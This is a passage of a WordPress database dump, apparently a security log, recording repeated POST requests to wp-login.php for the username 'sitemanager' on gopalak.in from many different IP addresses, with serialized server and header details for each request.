Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46606\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745522903.697881;s:12:\"REQUEST_TIME\";i:1745522903;}}','94.23.61.165',0,'2025-04-25 00:58:25','1970-01-01 00:00:00'),(94180,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52264\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745523663.037781;s:12:\"REQUEST_TIME\";i:1745523663;}}','164.160.91.40',0,'2025-04-25 01:11:04','1970-01-01 00:00:00'),(94181,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38858\";s:11:\"REMOTE_ADDR\";s:13:\"85.215.220.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745524038.2530611;s:12:\"REQUEST_TIME\";i:1745524038;}}','85.215.220.72',0,'2025-04-25 01:17:20','1970-01-01 00:00:00'),(94182,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59698\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745524785.447937;s:12:\"REQUEST_TIME\";i:1745524785;}}','23.239.27.53',0,'2025-04-25 01:29:47','1970-01-01 00:00:00'),(94183,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46152\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.105\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745525158.2268431;s:12:\"REQUEST_TIME\";i:1745525158;}}','162.0.232.105',0,'2025-04-25 01:36:00','1970-01-01 00:00:00'),(94184,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51256\";s:11:\"REMOTE_ADDR\";s:13:\"185.8.173.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745525534.8236051;s:12:\"REQUEST_TIME\";i:1745525534;}}','185.8.173.159',0,'2025-04-25 01:42:16','1970-01-01 00:00:00'),(94185,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53594\";s:11:\"REMOTE_ADDR\";s:13:\"31.128.34.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745526271.5621631;s:12:\"REQUEST_TIME\";i:1745526271;}}','31.128.34.213',0,'2025-04-25 01:54:33','1970-01-01 00:00:00'),(94186,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34936\";s:11:\"REMOTE_ADDR\";s:12:\"74.50.95.214\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745526642.5112031;s:12:\"REQUEST_TIME\";i:1745526642;}}','74.50.95.214',0,'2025-04-25 02:00:44','1970-01-01 00:00:00'),(94187,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52704\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745527015.029278;s:12:\"REQUEST_TIME\";i:1745527015;}}','31.172.67.59',0,'2025-04-25 02:06:56','1970-01-01 00:00:00'),(94188,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60656\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.255.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745527388.52038;s:12:\"REQUEST_TIME\";i:1745527388;}}','162.213.255.38',0,'2025-04-25 02:13:10','1970-01-01 00:00:00'),(94189,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55750\";s:11:\"REMOTE_ADDR\";s:14:\"103.186.185.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745527760.442323;s:12:\"REQUEST_TIME\";i:1745527760;}}','103.186.185.28',0,'2025-04-25 02:19:22','1970-01-01 